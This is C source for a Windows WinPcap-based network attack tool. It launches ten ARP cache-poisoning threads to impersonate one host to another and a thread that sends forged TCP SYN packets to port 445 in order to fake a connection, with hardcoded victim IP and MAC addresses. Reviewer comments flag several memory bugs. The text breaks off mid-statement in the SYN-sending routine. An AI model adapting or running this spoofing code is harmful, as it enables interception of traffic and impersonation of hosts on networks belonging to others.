#include <winsock2.h>
#include "Packet32.h"
#include <stdio.h>
#pragma comment(lib, "packet.lib")
#pragma comment(lib, "ws2_32.lib")
// The following macros are the IP and MAC addresses of the hosts used for testing
#define SIMULATE_MAC "0011111d735a" // MAC address of the impersonated host
#define TARGET_MAC "001111c6f7fe" // MAC address of the destination host
#define LOCAL_MAC "00e06e41508f" // MAC address of this machine
#define TARGET_IP "192.168.0.2" // IP of the destination host
#define SIMULATE_IP "192.168.0.1" // IP of the impersonated host
#define NDIS_PACKET_TYPE_DIRECTED 0x0001 // directed mode
#pragma pack(push, 1)
// Ethernet frame header (14 bytes under the surrounding #pragma pack(1)).
struct ET_HEADER
{
unsigned char eh_dst[6]; // destination MAC
unsigned char eh_src[6]; // source MAC
unsigned short eh_type; // EtherType, stored in network byte order by the sender
};
// ARP header. Field order follows the wire format; the layout relies on
// the enclosing #pragma pack(1), since arp_spa/arp_tpa sit at unaligned offsets.
struct ARP_HEADER
{
unsigned short arp_hdr; // hardware type
unsigned short arp_pro; // protocol type
unsigned char arp_hln; // hardware address length
unsigned char arp_pln; // protocol address length
unsigned short arp_opt; // operation (request/reply)
unsigned char arp_sha[6]; // sender hardware address
unsigned long arp_spa; // sender protocol (IPv4) address
unsigned char arp_tha[6]; // target hardware address
unsigned long arp_tpa; // target protocol (IPv4) address
};
// IPv4 header without options (20 bytes under #pragma pack(1)).
// NOTE(review): single-byte fields are plain `char`, which is signed on MSVC;
// values >= 0x80 (e.g. a TTL of 128) will be negative when read back as int.
struct IP_HEADER
{
char m_ver_hlen; // 4-bit version, 4-bit header length (in 32-bit words)
char m_tos; // type of service
USHORT m_tlen; // total length
USHORT m_ident; // identification
USHORT m_flag_frag; // 3 flag bits (1 unused, DF, MF), 13-bit fragment offset
char m_ttl; // time to live
char m_protocol; // upper-layer protocol number
USHORT m_cksum; // header checksum
ULONG m_sIP; // source address
ULONG m_dIP; // destination address
};
// TCP header without options (20 bytes under #pragma pack(1)).
struct TCP_HEADER
{
USHORT m_sport; // source port
USHORT m_dport; // destination port
ULONG m_seq; // sequence number
ULONG m_ack; // acknowledgement number
char m_hlen_res4; // 4-bit header length, then the first 4 of the 6 reserved bits
char m_res2_flag; // last 2 reserved bits, then the 6 flag bits
USHORT m_win; // window size
USHORT m_cksum; // checksum
USHORT m_urp; // urgent pointer
};
// Pseudo header prepended to the TCP segment when computing the checksum.
struct PSD_HEADER
{
ULONG m_saddr; // source address
ULONG m_daddr; // destination address
char m_mbz; // zero byte (the name suggests "must be zero"; the original left it uncommented)
char m_ptcl; // protocol type
USHORT m_tcpl; // TCP length
};
// TCP options block appended to the SYN; used to negotiate with the peer
// when the fake connection is initiated. Raw layout, no field is named by
// its option kind, so the meaning of each slot is only as documented here.
struct TCP_OPTION
{
USHORT unKnown; // not described by the original author — presumably an option kind/length pair, verify against the wire format
USHORT maxSegSize; // MSS, generally 1460 on Ethernet
char no1; // filler/option byte (undocumented in the original)
char no2; // filler/option byte (undocumented in the original)
USHORT SACK; // SACK-permitted option slot
};
// Parameters handed to an ARP spoofing thread (ArpCheat).
// The strings are filled with memcpy of strlen() bytes into zero-initialised
// structs, so NUL termination depends on the caller zeroing the struct first.
struct CHEAT_ARP_INFO
{
char simulateIP[20]; // dotted-quad IP the thread claims to be
char targetIP[20]; // dotted-quad IP of the host that receives the ARP frames
char targetMAC[13]; // 12 hex chars + NUL, the MAC of that host
};
#pragma pack(pop)
USHORT CheckSum(USHORT *buffer, int size); // computes the Internet checksum over `size` bytes
void StrToMac(char *str,char *mac); // converts a 12-hex-char string to a 6-byte MAC
void ListenACK(); // listen loop; waits for the peer's reply packets
void AssayAndSendData(LPPACKET lpPacket); // parses a received frame and sends the reply
DWORD WINAPI ArpCheat(void *pInfo); // ARP spoofing thread; pInfo is a CHEAT_ARP_INFO*
DWORD WINAPI SendSyn(void *no); // thread that sends the SYN packets
// Process-wide state shared between main and the worker threads.
LPADAPTER lpAdapter=NULL; // adapter handle opened in main, used by every sender
USHORT ipID=1638; // IP identification; incremented by the SendSyn thread (ipID++) without any synchronization
USHORT sourcePort=1056; // initial source port
USHORT targetPort=445; // destination port
// Entry point: initialises Winsock, opens the first Packet32 adapter,
// starts ten ArpCheat threads plus one SendSyn thread, then blocks in
// ListenACK(). Returns -1 on any setup failure, 0 if ListenACK returns.
int main(int argc, char* argv[])
{
WSADATA wsaData;
if(WSAStartup(MAKEWORD(2,1), &wsaData)!=0)
{
printf("WSAStartup error!\n");
return -1;
}
// Open the adapter:
// NOTE(review): the buffer holds 2048 WCHARs (4096 bytes) but the length
// passed below is 1024 — confirm against the Packet32 docs whether the
// length is in bytes or characters; as written the two do not agree.
WCHAR adapter_name[2048]={0};
ULONG adapter_length=1024;
// Retrieve the names of all adapters.
if(PacketGetAdapterNames((char*)adapter_name, &adapter_length)==FALSE)
{
// adapter_name: a buffer that receives the adapter names
// adapter_length: the size of that buffer
printf("PacketGetAdapterNames error:%d\n",GetLastError());
return -1;
}
WCHAR *name1,*name2;
ULONG i;
static CHAR adapter_list[10][1024];
name1=adapter_name;
name2=adapter_name;
i=0;
// Copy each NUL-separated adapter name in adapter_name into adapter_list[];
// i counts the names, starting at 0 for the first.
// NOTE(review): on the first iteration name1 == adapter_name, so the
// *(name1-1) test reads one WCHAR before the start of the array (UB).
// NOTE(review): the memcpy below always writes to adapter_list[0], not
// adapter_list[i], so only the last name copied survives and i is never
// used as an index; it also has no bound on 2*(name1-name2) against the
// 1024-byte row, nor on i against the 10 rows.
while((*name1!='\0'|| (*(name1-1)!='\0')))
{
if(*name1=='\0')
{
memcpy(adapter_list,name2,2*(name1-name2));
name2=name1+1;
i++;
}
name1++;
}
// Open the first adapter by default.
// The CHAR row holds the raw UTF-16 bytes copied above, hence the LPTSTR
// cast; this only works in a Unicode (TCHAR == WCHAR) build.
lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)adapter_list[0]);
if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf("Unable to open the driver, Error Code : %lx\n", GetLastError());
return -1;
}
// Create the ARP spoofing threads:
// info1 impersonates SIMULATE_IP towards TARGET_IP; info2..info10 are all
// identical (impersonate TARGET_IP towards SIMULATE_IP), so nine threads
// send the same frames. Every CreateThread handle is discarded without
// CloseHandle, and the info structs live on main's stack — they stay valid
// only because main blocks in ListenACK() below.
CHEAT_ARP_INFO info1={0},info2={0},info3={0},info4={0},info5={0},info6={0},info7={0},info8={0},info9={0},info10={0};
memcpy(info1.simulateIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info1.targetIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info1.targetMAC,TARGET_MAC,strlen(TARGET_MAC));
::CreateThread(NULL,0,ArpCheat,&info1,0,NULL);
memcpy(info2.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info2.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info2.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info2,0,NULL);
memcpy(info3.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info3.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info3.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info3,0,NULL);
memcpy(info4.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info4.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info4.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info4,0,NULL);
memcpy(info5.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info5.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info5.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info5,0,NULL);
memcpy(info6.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info6.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info6.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info6,0,NULL);
memcpy(info7.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info7.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info7.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info7,0,NULL);
memcpy(info8.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info8.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info8.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info8,0,NULL);
memcpy(info9.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info9.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info9.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info9,0,NULL);
memcpy(info10.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info10.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info10.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info10,0,NULL);
Sleep(50);
// Send the SYN frames of the fake TCP connection on a separate thread:
// (its handle is discarded as well)
::CreateThread(NULL,0,SendSyn,NULL,0,NULL);
ListenACK(); // receive loop; whether it ever returns is not visible here
// NOTE(review): the worker threads are still running when the adapter is
// closed below — nothing stops or joins them first.
PacketCloseAdapter(lpAdapter); // close the adapter
::WSACleanup();
return 0;
}
DWORD WINAPI SendSyn(void *no)
{
Sleep(100);
while(TRUE) //循环发送SYN包发起伪连接
{
char s_mac[6]={0},d_mac[6]={0};
char sendSynBuf[128]={0};
ET_HEADER et_header={0};
IP_HEADER ip_header={0};
TCP_HEADER tcp_header={0};
TCP_OPTION tcp_option={0};
PSD_HEADER psd_header={0};
//填充以太头部:
StrToMac(LOCAL_MAC,s_mac); //local_mac
memcpy(et_header.eh_src,s_mac,6);
StrToMac(TARGET_MAC,d_mac); //dest_mac
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0800); //类型为0x0800表示这是IP包
//填充IP头部:
ip_header.m_ver_hlen=(4<<4|5);
ip_header.m_tos=0;
ip_header.m_tlen=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
ip_header.m_ident=htons(ipID++);
ip_head